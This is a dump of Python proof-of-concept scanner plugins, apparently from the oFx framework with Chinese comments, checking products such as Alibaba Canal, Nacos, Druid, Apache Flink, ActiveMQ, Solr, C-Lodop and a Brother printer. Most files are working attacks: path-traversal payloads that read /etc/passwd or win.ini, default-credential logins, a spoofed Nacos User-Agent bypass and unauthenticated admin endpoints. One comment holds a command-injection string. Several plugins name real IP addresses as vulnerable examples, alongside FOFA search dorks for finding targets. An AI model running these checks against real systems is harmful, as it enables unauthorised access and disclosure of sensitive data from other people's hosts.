36 | "example" : "https://183.166.187.208:8443/api/dbstat/gettablessize", # 存在漏洞的演示url,写一个就可以了
37 | "exp_img" : "", # 先不管
38 |
39 | }
40 |
41 | timeout = 10
42 |
43 | def _verify(self):
44 | """
45 | 返回vuln
46 |
47 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
48 |
49 | 不存在漏洞:vuln = [False,""]
50 | """
51 | vuln = [False,""]
52 | url = self.target + "/api/dbstat/gettablessize" # url自己按需调整
53 |
54 |
55 |
56 | headers = {"User-Agent":get_random_ua(),
57 | "Connection":"close",
58 | # "Content-Type": "application/x-www-form-urlencoded",
59 | }
60 |
61 | try:
62 | """
63 | 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
64 | """
65 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
66 | if req.status_code == 200 and "\"result\":0,\"reason\":\"success\"" in req.text:
67 | vuln = [True,req.text]
68 | else:
69 | vuln = [False,req.text]
70 | except Exception as e:
71 | raise e
72 |
73 | if self._honeypot_check(vuln[1]) == True:
74 | vuln[0] = False
75 |
76 | return vuln
77 |
78 |
79 | def _attack(self):
80 | return self._verify()
--------------------------------------------------------------------------------
/poc/Alibaba_Canal/Weak_Pass/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
10 | class POC(POCBase):
11 |
12 | _info = {
13 | "author" : "hansi", # POC作者
14 | "version" : "1", # POC版本,默认是1
15 | "CreateDate" : "2022-1-10", # POC创建时间
16 | "UpdateDate" : "2022-1-10", # POC创建时间
17 | "PocDesc" : """
18 |
19 |
20 | """, # POC描述,写更新描述,没有就不写
21 |
22 | "name" : "AlibabaCanalconfig弱口令漏洞", # 漏洞名称
23 | "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
24 | "AppName" : "Alibaba_Canal", # 漏洞应用名称
25 | "AppVersion" : "无", # 漏洞应用版本
26 | "VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
27 | "VulnDesc" : """
28 |
29 | """, # 漏洞简要描述
30 |
31 | "fofa-dork":"", """
32 | title="Canal Admin"
33 | """ # fofa搜索语句
34 | "example" : "http://47.96.12.221:8089/", # 存在漏洞的演示url,写一个就可以了
35 | "exp_img" : "", # 先不管
36 |
37 | }
38 |
39 |
40 |
41 | def _verify(self):
42 | """
43 | 返回vuln
44 |
45 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
46 |
47 | 不存在漏洞:vuln = [False,""]
48 | """
49 | vuln = [False,""]
50 | url = self.target + "/api/v1/user/login" # url自己按需调整
51 | # date="command1=shell:ifconfig| dd of=/tmp/a.txt"
52 |
53 | headers = {"User-Agent":get_random_ua(),
54 | "Connection":"close",
55 | "Content-Type": "application/json;charset=UTF-8",
56 | }
57 | data = """
58 | {"username":"admin","password":"123456"}
59 | """
60 | try:
61 | """
62 | 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
63 | """
64 | req = requests.post(url,headers = headers , data = data, proxies = self.proxy , timeout = self.timeout,verify = False)
65 | if "\"code\":20000,\"message\":null,\"data\"" in req.text and req.status_code == 200 :
66 | vuln = [True,req.text]
67 | else:
68 | vuln = [False,req.text]
69 | except Exception as e:
70 | raise e
71 |
72 | if self._honeypot_check(vuln[1]) == True:
73 | vuln[0] = False
74 |
75 | return vuln
76 |
77 |
78 | def _attack(self):
79 | return self._verify()
--------------------------------------------------------------------------------
/poc/Alibaba_Druid/Unauth_Access/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 |
10 | class POC(POCBase):
11 | _info = {
12 | "author" : "jijue", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2021-03-10", # POC创建时间
15 | "UpdateDate" : "2021-03-10", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "Druid未授权访问", # 漏洞名称
21 | "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 |
23 | "AppName" : "druid", # 漏洞应用名称
24 | "AppVersion" : "全版本", # 漏洞应用版本
25 | "VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写能查到的最早的文献日期,格式:xxxx-xx-xx
26 | "VulnDesc" : """
27 | Druid是阿里巴巴数据库事业部出品,为监控而生的数据库连接池。
28 | Druid提供的监控功能,监控SQL的执行时间、监控Web URI的请求、Session监控。
29 | 当开发者配置不当时就可能造成未授权访问漏洞。
30 | """, # 漏洞简要描述
31 |
32 | "fofa-dork":"", # fofa搜索语句
33 | "example" : "", # 存在漏洞的演示url,写一个就可以了
34 | "exp_img" : "", # 先不管
35 |
36 | }
37 |
38 | timeout = 10
39 |
40 | def _verify(self):
41 | """
42 | 返回vuln
43 |
44 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
45 |
46 | 不存在漏洞:vuln = [False,""]
47 | """
48 | vuln = [False,""]
49 | url = self.target + "/druid/index.html" # url自己按需调整
50 |
51 | headers = {"User-Agent":"Mozilla/5.0 (Windows ME; U; en) Opera 8.51",
52 | "Connection":"close"}
53 |
54 | try:
55 | """
56 | 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
57 | """
58 | req = requests.get(url,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False)
59 | if req.status_code == 200 and "druid.index.init();" in req.text:
60 | vuln = [True,req.text]
61 | else:
62 | vuln = [False,""]
63 | except Exception as e:
64 | raise e
65 |
66 | if self._honeypot_check(vuln[1]) == True:
67 | vuln[0] = False
68 |
69 | return vuln
70 |
71 |
72 | def _attack(self):
73 | return self._verify()
--------------------------------------------------------------------------------
/poc/Alibaba_Nacos/Unauth_Access/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 | _info = {
11 | "author" : "jijue", # POC作者
12 | "version" : "1", # POC版本,默认是1
13 | "CreateDate" : "2021-06-08", # POC创建时间
14 | "UpdateDate" : "2021-06-08", # POC创建时间
15 | "PocDesc" : """
16 | 略
17 | """, # POC描述,写更新描述,没有就不写
18 |
19 | "name" : "Nacos未授权访问", # 漏洞名称
20 | "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
21 |
22 | "AppName" : "Nacos", # 漏洞应用名称
23 | "AppVersion" : "Nacos <= 2.0.0-ALPHA.1", # 漏洞应用版本
24 | "VulnDate" : "2020-12-29", # 漏洞公开的时间,不知道就写能查到的最早的文献日期,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 | Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 | title="Nacos"
31 | """, # fofa搜索语句
32 | "example" : "https://47.108.74.113/v1/auth/users?pageNo=1&pageSize=100", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 |
35 | }
36 |
37 | timeout = 10
38 |
39 | def _verify(self):
40 | """
41 | 返回vuln
42 |
43 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
44 |
45 | 不存在漏洞:vuln = [False,""]
46 | """
47 | vuln = [False,""]
48 | url = self.target + "/v1/auth/users?pageNo=1&pageSize=100" # url自己按需调整
49 |
50 |
51 | headers = {"User-Agent":"Nacos-Server",
52 | "Connection":"close",
53 | "Content-Type": "application/x-www-form-urlencoded",}
54 |
55 | try:
56 | """
57 | 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
58 | """
59 | req = requests.get(url,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False)
60 | if req.status_code == 200 and "username" in req.text and "pageItems" in req.text:
61 | vuln = [True,req.text]
62 | else:
63 | vuln = [False,req.text]
64 | except Exception as e:
65 | raise e
66 |
67 | if self._honeypot_check(vuln[1]) == True:
68 | vuln[0] = False
69 |
70 | return vuln
71 |
72 | def _attack(self):
73 | return self._verify()
--------------------------------------------------------------------------------
/poc/Apache_ActiveMQ/Physical_Path_Disclosure/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "jijue", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2022-01-01", # POC创建时间
15 | "UpdateDate" : "2022-01-01", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "ActiveMQ物理路径泄漏漏洞", # 漏洞名称
21 | "VulnID" : "oFx-2022-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "ActiveMQ", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2022-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 | ActiveMQ默认开启PUT请求,当开启PUT时,构造好Payload(即不存在的目录),Response会返回相应的物理路径信息
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 | app="APACHE-ActiveMQ"
31 | """, # fofa搜索语句
32 | "example" : "", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 | }
35 |
36 | def _verify(self):
37 | """
38 | 返回vuln
39 |
40 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
41 |
42 | 不存在漏洞:vuln = [False,""]
43 | """
44 | vuln = [False,""]
45 | url = self.target + "/fileserver/a../../%08/..%08/.%08/%08" # url自己按需调整
46 |
47 |
48 | headers = {"User-Agent":get_random_ua(),
49 | "Connection":"close",
50 | "Authorization" : "Basic YWRtaW46YWRtaW4=",
51 | # "Content-Type": "application/x-www-form-urlencoded",
52 | }
53 |
54 | try:
55 | """
56 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
57 | """
58 | req = requests.put(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
59 | if req.status_code == 500 and req.raw._original_response.reason != "Server Error":
60 | vuln = [True,req.text]
61 | else:
62 | vuln = [False,req.text]
63 | except Exception as e:
64 | raise e
65 |
66 | # 以下逻辑酌情使用
67 | if self._honeypot_check(vuln[1]) == True:
68 | vuln[0] = False
69 |
70 | return vuln
71 |
72 | def _attack(self):
73 | return self._verify()
--------------------------------------------------------------------------------
/poc/Apache_ActiveUC/Active_UC_Info_Disclosure/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "hansi", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2022-01-12", # POC创建时间
15 | "UpdateDate" : "2022-01-12", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "网动统一通信平台Active UC存在信息泄露漏洞", # 漏洞名称
21 | "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2022-03-04", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 |
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 |
31 | title="网动统一通信平台"
32 | """, # fofa搜索语句
33 | "example" : "http://60.205.143.8/acenter/monitoring", # 存在漏洞的演示url,写一个就可以了
34 | "exp_img" : "", # 先不管
35 | }
36 |
37 | # timeout = 10
38 |
39 |
40 | def _verify(self):
41 | """
42 | 返回vuln
43 |
44 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
45 |
46 | 不存在漏洞:vuln = [False,""]
47 | """
48 | vuln = [False,""]
49 | url = self.target + "/acenter/monitoring" # url自己按需调整
50 |
51 | headers = {"User-Agent":get_random_ua(),
52 | "Connection":"close",
53 | #"Content-Type": "application/x-www-form-urlencoded",
54 | }
55 |
56 | try:
57 | """
58 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
59 | """
60 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
61 | if req.status_code ==200 and "监控系统"in req.text:
62 | vuln = [True,req.text]
63 | else:
64 | vuln = [False,req.text]
65 | except Exception as e:
66 | raise e
67 |
68 | # 以下逻辑酌情使用
69 | if self._honeypot_check(vuln[1]) == True:
70 | vuln[0] = False
71 |
72 | return vuln
73 |
74 | def _attack(self):
75 | return self._verify()
76 |
--------------------------------------------------------------------------------
/poc/Apache_Flink/Dir_Traversal_CVE-2020-17519/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
10 | class POC(POCBase):
11 |
12 | _info = {
13 | "author" : "jijue", # POC作者
14 | "version" : "1", # POC版本,默认是1
15 | "CreateDate" : "2021-06-09", # POC创建时间
16 | "UpdateDate" : "2021-06-09", # POC创建时间
17 | "PocDesc" : """
18 | 略
19 | """, # POC描述,写更新描述,没有就不写
20 |
21 | "name" : "Apache Flink目录穿透(CVE-2020-17519)", # 漏洞名称
22 | "VulnID" : "CVE-2020-17519", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
23 | "AppName" : "Apache Flink", # 漏洞应用名称
24 | "AppVersion" : "Apache Flink 1.11.0", # 漏洞应用版本
25 | "VulnDate" : "2020-01-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
26 | "VulnDesc" : """
27 |
28 | """, # 漏洞简要描述
29 |
30 | "fofa-dork":"", # fofa搜索语句
31 | "example" : "", # 存在漏洞的演示url,写一个就可以了
32 | "exp_img" : "", # 先不管
33 |
34 | }
35 |
36 | timeout = 10
37 |
38 | def _verify(self):
39 | """
40 | 返回vuln
41 |
42 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
43 |
44 | 不存在漏洞:vuln = [False,""]
45 | """
46 | vuln = [False,""]
47 | url = self.target + "/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd" # url自己按需调整
48 |
49 | headers = {"User-Agent":get_random_ua(),
50 | "Connection":"close",
51 | # "Content-Type": "application/x-www-form-urlencoded",
52 | }
53 |
54 | try:
55 | """
56 | 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
57 | """
58 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
59 | if req.status_code == 200 and "root:/root" in req.text:
60 | vuln = [True,req.text]
61 | else:
62 | vuln = [False,req.text]
63 | except Exception as e:
64 | raise e
65 |
66 | if self._honeypot_check(vuln[1]) == True:
67 | vuln[0] = False
68 |
69 | return vuln
70 |
71 | def _attack(self):
72 | return self._verify()
--------------------------------------------------------------------------------
/poc/Apache_Flink/RCE_CVE_2020_17518/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "jijue", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2021-06-09", # POC创建时间
15 | "UpdateDate" : "2021-06-09", # POC创建时间
16 | "PocDesc" : """
17 | 这个POC只能说检测结果是可能存在漏洞,不是一定的
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "Apache Flink <= 1.9.1远程代码执行 CVE-2020-17518", # 漏洞名称
21 | "VulnID" : "CVE-2020-17518", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "Apache Flink", # 漏洞应用名称
23 | "AppVersion" : "Apache Flink <= 1.9.1", # 漏洞应用版本
24 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 | 通过构造恶意的http header,可实现远程文件写入
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 |
31 | """, # fofa搜索语句
32 | "example" : "", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 | }
35 |
36 | def _verify(self):
37 | """
38 | 返回vuln
39 |
40 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
41 |
42 | 不存在漏洞:vuln = [False,""]
43 | """
44 | vuln = [False,""]
45 | url = self.target + "/jars/upload" # url自己按需调整
46 |
47 |
48 | headers = {"User-Agent":get_random_ua(),
49 | "Connection":"close",
50 | # "Content-Type": "application/x-www-form-urlencoded",
51 | }
52 |
53 | try:
54 | """
55 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
56 | """
57 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
58 | if "Unable to load requested file /jars/upload." in req.text:
59 | vuln = [True,req.text]
60 | else:
61 | vuln = [False,req.text]
62 | except Exception as e:
63 | raise e
64 |
65 | # 以下逻辑酌情使用
66 | if self._honeypot_check(vuln[1]) == True:
67 | vuln[0] = False
68 |
69 | return vuln
70 |
71 | def _attack(self):
72 | return self._verify()
--------------------------------------------------------------------------------
/poc/Apache_Solr/Unauth_Access/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 |
10 | class POC(POCBase):
11 | _info = {
12 | "author" : "Du9r1", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2022-11-2", # POC创建时间
15 | "UpdateDate" : "2022-11-2", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "Solr未授权访问", # 漏洞名称
21 | "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 |
23 | "AppName" : "solr", # 漏洞应用名称
24 | "AppVersion" : "全版本", # 漏洞应用版本
25 | "VulnDate" : "2021-03-10", # 漏洞公开的时间,不知道就写能查到的最早的文献日期,格式:xxxx-xx-xx
26 | "VulnDesc" : """
27 | Solr应用服务器安装后未进行管理界面访问限制,导致管理界面可直接进行访问,泄露敏感信息并可对Solr进行进一步的管理。
28 | 当开发者配置不当时就可能造成未授权访问漏洞。
29 | """, # 漏洞简要描述
30 |
31 | "fofa-dork":'title="solr"&&country="CN"', # fofa搜索语句
32 | "example" : "", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 |
35 | }
36 |
37 | timeout = 10
38 |
39 | def _verify(self):
40 | """
41 | 返回vuln
42 |
43 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
44 |
45 | 不存在漏洞:vuln = [False,""]
46 | """
47 | vuln = [False,""]
48 | url = self.target + "/solr/admin/cores" # url自己按需调整
49 |
50 | headers = {"User-Agent":"Mozilla/5.0 (Windows ME; U;cd en) Opera 8.51",
51 | "Connection":"close"}
52 |
53 | try:
54 | """
55 | 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
56 | """
57 | req = requests.get(url,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False)
58 | if req.status_code == 200 and "responseHeader" in req.text:
59 | vuln = [True,req.text]
60 | else:
61 | vuln = [False,""]
62 | except Exception as e:
63 | raise e
64 |
65 | if self._honeypot_check(vuln[1]) == True:
66 | vuln[0] = False
67 |
68 | return vuln
69 |
70 |
71 | def _attack(self):
72 | return self._verify()
--------------------------------------------------------------------------------
/poc/BSPHP/Info_Disclosure/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "jijue", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2021-06-09", # POC创建时间
15 | "UpdateDate" : "2021-06-09", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "BSPHP 未授权访问 信息泄露漏洞", # 漏洞名称
21 | "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "BSPHP", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 | BSPHP 存在未授权访问 泄露用户 IP 和 账户名信息
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 | "BSPHP"
31 | """, # fofa搜索语句
32 | "example" : "", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 | }
35 |
36 | def _verify(self):
37 | """
38 | 返回vuln
39 |
40 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
41 |
42 | 不存在漏洞:vuln = [False,""]
43 | """
44 | vuln = [False,""]
45 | url = self.target + "/admin/index.php?m=admin&c=log&a=table_json&json=get&soso_ok=1&t=user_login_log&page=1&limit=10&bsphptime=1600407394176&soso_id=1&soso=&DESC=0‘" # url自己按需调整
46 |
47 |
48 | headers = {"User-Agent":get_random_ua(),
49 | "Connection":"close",
50 | # "Content-Type": "application/x-www-form-urlencoded",
51 | }
52 |
53 | try:
54 | """
55 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
56 | """
57 | req = requests.get(url,headers = headers , proxies = self.proxy ,timeout = self.timeout,verify = False)
58 | if "application/json" in str(req.headers["Content-Type"]) and '{"data":[{"key":' in req.text:#req.status_code == 200 and :
59 | vuln = [True,req.text]
60 | else:
61 | vuln = [False,req.text]
62 | except Exception as e:
63 | raise e
64 |
65 | # 以下逻辑酌情使用
66 | if self._honeypot_check(vuln[1]) == True:
67 | vuln[0] = False
68 |
69 | return vuln
70 |
71 | def _attack(self):
72 | return self._verify()
--------------------------------------------------------------------------------
/poc/Brother MFC-L2730DW/Weak_Pass/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "hansi", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2022-09-07", # POC创建时间
15 | "UpdateDate" : "2022-09-07", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "Brother MFC-L2730DW series弱口令漏洞", # 漏洞名称
21 | "VulnID" : "oFx-2022-0906", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2022-09-07", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 |
27 | """, # 漏洞简要描述
28 |
29 | "fofa-dork":"""
30 | title="Brother HL-L8360CDW series"
31 | """, # fofa搜索语句
32 | "example" : "", # 存在漏洞的演示url,写一个就可以了
33 | "exp_img" : "", # 先不管
34 | }
35 |
36 |
37 | def _verify(self):
38 | """
39 | 返回vuln
40 |
41 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
42 |
43 | 不存在漏洞:vuln = [False,""]
44 | """
45 | vuln = [False,""]
46 | url = self.target + "/general/status.html" # url自己按需调整
47 | data = "CSRFToken=uDmE4RvNEHZfHNtcOruqZPtWbT3IjovV%2B4zyo6cxVUZWt2Loyw%3D%3D&B5be=initpass&loginurl=%2Fgeneral%2Fstatus.html"
48 |
49 | headers = {"User-Agent":get_random_ua(),
50 | "Connection":"close",
51 | # "Content-Type": "application/x-www-form-urlencoded",
52 | }
53 |
54 | try:
55 | """
56 | 检测逻辑,漏洞存在则修改vuln值为True,漏洞不存在则不动
57 | """
58 | req = requests.post(url,headers = headers , data= data ,proxies = self.proxy ,timeout = self.timeout,verify = False)
59 | if "Administrator" in req.text:#req.status_code == 200 and :
60 | vuln = [True,req.text]
61 | else:
62 | vuln = [False,req.text]
63 | except Exception as e:
64 | raise e
65 |
66 | # 以下逻辑酌情使用
67 | if self._honeypot_check(vuln[1]) == True:
68 | vuln[0] = False
69 |
70 | return vuln
71 |
72 | def _attack(self):
73 | return self._verify()
74 |
--------------------------------------------------------------------------------
/poc/C_Lodop/File_Read/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 |
6 | # ...
7 | import urllib3
8 | urllib3.disable_warnings()
9 |
10 | class POC(POCBase):
11 |
12 | _info = {
13 | "author" : "hansi", # POC作者
14 | "version" : "1", # POC版本,默认是1
15 | "CreateDate" : "2021-07-01", # POC创建时间
16 | "UpdateDate" : "2021-07-01", # POC创建时间
17 | "PocDesc" : """
18 | 略
19 | """, # POC描述,写更新描述,没有就不写
20 |
21 | "name" : "C-Lodop 云打印机系统平台任意文件读取漏洞", # 漏洞名称
22 | "VulnID" : "", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
23 | "AppName" : "", # 漏洞应用名称
24 | "AppVersion" : "C-Lodop C-Lodop打印服务系统 2.0.4.7", # 漏洞应用版本
25 | "VulnDate" : "2021-07-01", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
26 | "VulnDesc" : """
27 | C-Lodop打印服务系统是一款云打印软件。 C-Lodop打印服务系统存在任意文件读取漏洞,攻击者可利用漏洞获取敏感信息。
28 | """, # 漏洞简要描述
29 |
30 | "fofa-dork":"""
31 | title="Welcome to C-Lodop"
32 | """, # fofa搜索语句
33 | "example" : "http://59.48.144.170:8000", # 存在漏洞的演示url,写一个就可以了
34 | "exp_img" : "", # 先不管
35 |
36 | }
37 |
38 | timeout = 10
39 |
40 | def _verify(self):
41 | """
42 | 返回vuln
43 |
44 | 存在漏洞:vuln = [True,html_source] # html_source就是页面源码
45 |
46 | 不存在漏洞:vuln = [False,""]
47 | """
48 | vuln = [False,""]
49 | url = self.target + "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini" # url自己按需调整
50 |
51 |
52 | headers = {"User-Agent":get_random_ua(),
53 | "Connection":"close",
54 | # "Content-Type": "application/x-www-form-urlencoded",
55 | }
56 | try:
57 | """
58 | 检测逻辑,漏洞存在则修改vuln值,漏洞不存在则不动
59 | """
60 | req = requests.get(url,headers = headers , proxies = self.proxy , timeout = self.timeout,verify = False)
61 | if req.status_code == 200 and "; for 16-bit app support" in req.text :
62 | vuln = [True,req.text]
63 | else:
64 | vuln = [False,req.text]
65 | except Exception as e:
66 | raise e
67 |
68 | if self._honeypot_check(vuln[1]) == True:
69 | vuln[0] = False
70 |
71 | return vuln
72 |
73 |
74 | def _attack(self):
75 | return self._verify()
--------------------------------------------------------------------------------
/poc/China_Mobile_中国移动/Info_Disclosure_Yu_routing_ExportSettings/poc.py:
--------------------------------------------------------------------------------
1 | # coding:utf-8
2 | import requests
3 | from lib.core.common import url_handle,get_random_ua
4 | from lib.core.poc import POCBase
5 | # ...
6 | import urllib3
7 | urllib3.disable_warnings()
8 |
9 | class POC(POCBase):
10 |
11 | _info = {
12 | "author" : "jijue", # POC作者
13 | "version" : "1", # POC版本,默认是1
14 | "CreateDate" : "2021-06-09", # POC创建时间
15 | "UpdateDate" : "2021-06-09", # POC创建时间
16 | "PocDesc" : """
17 | 略
18 | """, # POC描述,写更新描述,没有就不写
19 |
20 | "name" : "中国移动 禹路由 ExportSettings.sh 敏感信息泄露漏洞", # 漏洞名称
21 | "VulnID" : "oFx-2021-0001", # 漏洞编号,以CVE为主,若无CVE,使用CNVD,若无CNVD,留空即可
22 | "AppName" : "中国移动 禹路由", # 漏洞应用名称
23 | "AppVersion" : "", # 漏洞应用版本
24 | "VulnDate" : "2021-06-09", # 漏洞公开的时间,不知道就写今天,格式:xxxx-xx-xx
25 | "VulnDesc" : """
26 | 中国移动 禹路由 ExportSettings.sh 存在敏感信息泄露漏洞,
27 | 攻击者通过漏洞获取配置文件,其中包含账号密码等敏感信息
28 | """, # 漏洞简要描述
29 |
30 | "fofa-dork":"""
31 | title="互联世界 物联未来-登录"
32 | """, # fofa搜索语句
33 | "example" : "", # 存在漏洞的演示url,写一个就可以了
34 | "exp_img" : "", # 先不管
35 | }
36 |
37 | def _verify(self):
38 | """
39 | 返回vuln
40 |
